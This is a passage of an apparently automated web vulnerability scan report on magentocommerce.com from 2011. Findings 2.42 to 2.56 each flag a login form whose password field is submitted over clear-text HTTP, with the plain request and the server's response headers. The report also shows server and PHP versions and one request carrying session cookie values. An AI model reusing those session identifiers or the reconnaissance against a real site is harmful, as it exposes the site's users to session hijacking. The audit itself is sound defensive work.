<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.42. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.43. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.44. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.45. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.46. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.47. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.48. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.49. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.50. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.51. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.52. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.53. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.54. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.55. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.56. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
